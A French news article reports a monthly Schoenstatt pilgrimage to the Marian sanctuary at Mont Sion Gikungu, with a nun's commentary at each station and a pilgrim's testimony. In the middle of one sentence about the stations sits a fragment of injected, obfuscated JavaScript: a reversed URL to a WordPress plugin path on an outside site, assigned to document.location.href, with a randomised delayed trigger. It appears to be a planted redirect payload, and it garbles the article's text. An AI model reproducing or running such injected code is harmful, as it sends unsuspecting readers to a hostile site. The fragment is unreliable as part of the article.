Les fidèles qui ont scellé l’alliance d’amour avec la Mère Trois fois Admirable sont venus faire un pèlerinage au Sanctuaire Marial ce samedi le 09 février 2019.
C’est un groupe complet. Il est fait des hommes, des femmes, des filles et garçons. Ils sont arrivés au Mont Sion Gikungu à 9 heures vingt et accueillis par la Sœur Marie Louise HARERIMANA une des sœurs de Marie de Schoenstatt.
Avec elle, ils ont pris le chemin Marial, lequel chemin les a conduits dans le Sanctuaire. Depuis la première station jusqu’à la quinzième, ils ont eu le temps de méditer sur la sculpture de chaque station. La sœur Louise leur a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné des explications sur chaque station.
Devant chaque station, on dirait une réunion. La sœur explique, eux ils écoutent. Après, ils posent des questions pour comprendre davantage. Ils prennent aussi un temps pour quelques commentaires. De station en station, ils avancent.
Devant la station, la Sœur explique de quoi il s’agit ; elle lit le passage biblique illustratif. Et puis, ils prennent un moment de silence pour la méditation. Ils adressent une prière à la Mère de Dieu.
Selon Sœur Louise, c’est une instruction : « on est en train d’étudier pour connaitre la vie de Marie. C’est très important parce que nous aussi nous sommes en route et la Mère de Dieu qui a vaincu est notre exemple. » Elle a ajouté qu’ils vont prendre peut être un autre jour pour seulement la prière et la méditation.
Le chemin marial qu’ils ont emprunté leur a fait arriver au Sanctuaire où ils ont rencontré et contemplé Jésus et parlé à sa Mère.
Un de ces pèlerins, Ernest MATEGEKO, se dit satisfait : « je suis vraiment heureux car je viens de découvrir des choses nouvelles. » Pour lui, c’est quelque chose de très important, savoir la vie qu’avait menée la Vierge Marie peut aider tout chrétien : « J’ai pu comprendre comment était la vie de Marie du début à la fin et ça va être nécessaire pour savoir orienter ma propre vie à l’exemple de celle de la Vierge. »
L’objectif du pèlerinage
« Comme les alliés, nous sommes venus pour se renouveler en faisant un pèlerinage, et recevoir un enseignement », a signalé Ernest. Ils ont clôturé leur pèlerinage vers 11 heures et demie.
Vous saurez que ce pèlerinage s’organise chaque premier samedi du mois.
Brigitte IRAKOZE